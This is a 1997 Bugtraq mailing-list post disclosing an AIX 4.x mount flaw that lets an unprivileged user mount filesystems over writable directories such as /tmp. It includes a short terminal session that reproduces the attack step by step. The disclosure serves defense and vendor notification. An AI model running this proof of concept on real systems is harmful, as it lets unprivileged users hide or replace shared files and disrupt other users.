Bugtraq mailing list archives
AIX 4.x Mount
From: ryan () PHAEDO COM (S. Ryan Quick)
Date: Sun, 28 Dec 1997 22:26:17 -0500
-----BEGIN PGP SIGNED MESSAGE----- My apologies if this is known already . . . however, I've seen nothing about it and it does concern me. I have verified a problem with mount on AIX 4.1.3, 4.1.4, 4.2.0, and 4.2.1 which allows a normal user to mount any filesystem (including those already mounted by the system) on top of any writable space. Immediately, as the script below shows, this allows a user to overwrite the contents of 777 directories with whatever files one wants. (e.g. Removing access to temporary files in /tmp) . . . sapphire /home/rquick > oslevel 4.1.4.0 sapphire /home/rquick > who am i rquick pts/2 sapphire /home/rquick > id uid=20653(rquick) gid=101(comtec) sapphire /home/rquick > ln -s /tmp mnt sapphire /home/rquick > mount /usr mnt sapphire /home/rquick > cd /tmp sapphire /tmp > ls OV dict include lpd sbin ucb adm dt lbin lpp share usg bin ebt lib man spool ccs eligibility local pub sys common etc lost+found samples tmp sapphire /tmp > cd sapphire /home/rquick > umount mnt sapphire /home/rquick > I have notified IBM of the problem . . . they have yet to respond. S. Ryan Quick UNIX Systems Engineer Phaedo Consulting, Inc. PGP: www.phaedo.com/ryan/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3a Charset: noconv iQCVAwUBNKcYXvUYDAQiV+tNAQHbKgP9HokdEF6xFHN2Q8E2/9YL5Lb4b8QAuI2k RXe6APFVr0ql7rFjCiw3oqvFUYFwyrfhGgkHbf2pJ7ItbuPUkAURWDQY4SyBgH6s Onw92WbgQkoycS8IIutMh/wVNH6X77jQzb24DBfokxsWpMsqCv0WyB6GuknZEPyq QP21o8n0YjY= =23mM -----END PGP SIGNATURE-----
Current thread:
- Oddities in RH 5.0 Tres Melton (Dec 28)
- Re: Oddities in RH 5.0 Frank Sweetser (Dec 28)
- Re: Oddities in RH 5.0 King O' Fun (Dec 28)
- Re: Oddities in RH 5.0 Chris Bond (Dec 28)
- AIX 4.x Mount S. Ryan Quick (Dec 28)
- Re: AIX 4.x Mount Troy A. Bollinger (Dec 28)
- iPass RoamServer 3.1 Chris A. Epler (Dec 29)
- Apache DoS attack? Micha? Zalewski (Dec 30)
- Re: Apache DoS attack? Mark Lowes (Dec 30)
- Re: Apache DoS attack? Pancrazio DE MAURO (Dec 30)